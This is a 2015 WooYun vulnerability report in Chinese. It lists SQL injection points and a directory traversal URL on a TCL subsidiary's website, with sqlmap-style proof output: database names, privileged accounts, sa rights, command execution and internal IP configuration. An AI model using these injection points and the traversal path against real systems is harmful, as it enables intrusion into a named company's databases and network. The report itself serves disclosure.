漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0104650
漏洞标题:TCL某站SQL注入打包
相关厂商:TCL集团财务有限公司
漏洞作者: 路人甲
提交时间:2015-03-31 15:24
修复时间:2015-04-05 15:26
公开时间:2015-04-05 15:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
TCL某站SQL注入打包
详细说明:
废话不多说,直接给出存在注入的链接
http://tclcomm.com/service/serinter.asp?type=%BD%BB%BB%BB%BB%FA 问题参数type
http://tclcomm.com/service/sernet1.asp?id=%E7%94%98%E8%82%83 问题参数id
http://tclcomm.com/purchase/info.asp?typeid=5 问题参数typeid
http://tclcomm.com/product/lefttop.asp?LanmuID=137&Pid=845&TypeID=12 问题参数Pid
http://tclcomm.com/zhaopin/zhaopin_detail.asp?zpid=152 问题参数zpid
http://tclcomm.com/news/newssearch.asp
POST keynews=1*&x=25&y=14 问题参数keynews
另外还有个地方可以遍历目录:
http://www.tclcomm.com/purchase/profiledown.asp?myPath=\qiyexingxiang\..\..\..\..\\WWW
漏洞证明:
available databases [11]:
[*] Finance
[*] hrmsys
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] txcard2012
[*] txcard20130402
[*] web
sa权限
database management system users privileges:
[*] BUILTIN\\Administrators
[*] MRPII_USER (administrator)
[*] sa_hr
[*] txhr (administrator)
[*] ut
[*] uttest
[*] websa (administrator)
[*] wwwsa
可以执行命令:
当前用户是 com\zhangwei
ipconfig
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address . . . . . . . . . . . : 10.90.1.250
Subnet Mask . . . . . . . . . . . : 255.255.248.0
Default Gateway . . . . . . . . . : 10.90.0.1
修复方案:
你们更专业
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-05 15:26
厂商回复:
最新状态:
暂无